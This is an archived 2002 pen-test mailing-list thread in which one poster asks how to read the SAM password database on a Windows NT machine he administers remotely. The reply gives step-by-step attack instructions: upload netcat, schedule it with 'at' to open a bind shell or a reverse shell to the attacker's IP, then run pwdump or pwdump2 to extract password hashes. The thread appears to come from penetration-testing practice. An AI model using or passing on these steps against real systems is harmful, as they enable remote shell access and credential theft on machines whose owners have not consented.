From: Panos Dimitriou (p.dimitriou@encode-sec.com)
Date: Wed Jun 26 2002 - 12:23:10 EDT
You can always upload any tool you like, such as pwdump, and then you
just have to execute it. In order to execute it you can:
1. upload netcat (nc.exe)
2. execute "net time \\target"
3. schedule a job like:
at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe and then establish a
connection (with netcat preferably) to port 2222
or, if the system is firewalled
at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe and have a netcat
listening on port 80 (nc -L -p 80)in order to establish a reverse shell.
After gaining a shell on the system execute pwdump and download the
results. Furthermore, if you use pwdump2 you can extract the passwords
even if the SAM is SYSKEY protected.
I hope this helped
________________________
Panos Dimitriou
Director, Managed Security Services
_________________________
ENCODE S.A.
3, R. Melodou str.
151 25 Marousi
Athens, Greece
_________________________
E Tel.: +30 (1) 6178410
E Fax.: +30 (1) 6109579
s p.dimitriou@encode-sec.com
" www.encode-sec.com
_________________________
-----Original Message-----
From: Pedro Miranda [mailto:rpmiranda@sonae.pt]
Sent: Tuesday, June 25, 2002 7:43 PM
To: pen-test@securityfocus.com
Subject: Access to a win NT box
Hi, I've got remote access to a wNT box using the command
\\machinename\c$ /user:machinename\administrator
So i've got administrator privileges but i want to access to the SAM
database.
I've tried to get \\winnt\repair\sam._ but i couldn't find the rdisk
comand.
Can anybody help tell me where can i find this software, or if there is
another way to get access to the sam file.
Thanks in advance
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:22 EDT